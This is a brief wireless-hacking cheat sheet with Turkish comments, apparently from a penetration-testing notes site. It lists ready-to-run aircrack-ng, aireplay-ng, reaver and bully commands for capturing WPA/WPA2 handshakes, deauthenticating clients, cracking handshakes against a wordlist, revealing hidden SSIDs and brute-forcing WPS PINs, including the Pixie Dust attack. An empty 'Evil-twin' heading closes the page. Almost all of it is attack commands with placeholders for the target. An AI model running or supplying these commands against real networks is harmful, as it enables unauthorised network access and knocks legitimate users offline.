Wireless V2
WPA-2/WPA
# Monitor Mode
airmon-ng start wlan0
# Scan Networks
airodump-ng --band abg wlan0mon
# Handshake Bekleme
airodump-ng wlan0mon --channel 8 --bssid <BSSID>
# Deauth
aireplay-ng -0 10 -a <BSSID> -c <HEDEF_MAC> wlan0mon
aireplay-ng -0 10 -a <BSSID> wlan0mon
aircrack-ng -w /usr/share/seclists/Passwords/WiFi-WPA/probable-v2-wpa-top4800.txt -b <BSSID> wpa2.cap
HIDDEN SSID
# Monitor Mode
airmon-ng start wlan0
# Scan Networks
airodump-ng wlan0mon
# <length: ...> yazanlar gizli network
airodump-ng -c 11 --bssid <BSSID> wlan0mon
# Hedef deauth olup auth olursa ESSID görünür olur
aireplay-ng -0 10 -a <BSSID> -c <CLIENT_MAC> wlan0mon
aireplay-ng -0 10 -a <BSSID> wlan0mon
WPS
airmon-ng start wlan0
wash -i wlan0mon
# PIN Bruteforce
reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv
# PIXIE Dust
reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -K 1 -vv
# Altarnatif
bully wlan0mon -b [BSSID] -c [kanal] -v 3
Evil-twin
// Some code
Last updated
Was this helpful?